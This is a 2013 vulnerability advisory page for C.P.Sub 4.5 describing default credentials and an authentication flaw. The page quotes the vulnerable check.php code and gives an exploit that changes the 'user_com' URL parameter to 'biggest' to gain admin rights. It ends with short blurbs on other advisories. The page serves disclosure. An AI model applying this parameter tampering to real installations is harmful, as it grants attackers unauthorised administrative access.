C.P.Sub Multiple Default Credentials Vulnerability

Published on November 11th, 2013
Summary

C.P.Sub Multiple suffers from default credentials vulnerability.

Credit:

The information has been provided by Chako.


Details

Vulnerable Systems:
 * C.P.Sub 4.5

By default, C.P.Sub installs with multiple unspecified default user credentials (username/password combination). These accounts allow remote attackers to trivially access the program or system and gain privileged access.

Improper Authentication:

Description:
C.P.Sub <= v4.5 use ‘user_com=’ parameter to identify if the user has admin privilege.
Therefore an attacker could simply change the value for ‘user_com=’ parameter to gain admin privilege.

/check.php (LINE: 36-44)

if($_GET[user_com] != ”)
{
$user_com = $_GET[user_com];
}elseif($_POST[user_com] != ”)
{
$user_com = $_POST[user_com];
}
if($user_com == ‘biggest’)
{

Exploit:

change
http://Example_Target/info.php?cookie=yes&user_com=second

to
http://Example_Target/info.php?cookie=yes&user_com=biggest

Disclosure Timeline:
Disclosure Date :2013-07-01

Categories: Exploits
Tags:

Related Posts

Exploits

BlueBorne Kernel version v3.3-rc1 Denial Of Service Vulnerability

The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 3.3-rc1 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.

Exploits

X5 Webserver 5.0 Remote Denial Of Service Exploit

X5 is the latest generation web server from iMatix Corporation.The Xitami product line stretches back to 1996. X5 is built using iMatix's current Base2 technology for multithreading applications. On multicore machines,it is much more scalable than Xitami/2.

Exploits

E-Journal (Old Version) Multiple Vulnerabilities

E-Journal (Old Version) Multiple Vulnerabilities including; SQL Injection, Privilege Escalation and File Upload Vulnerability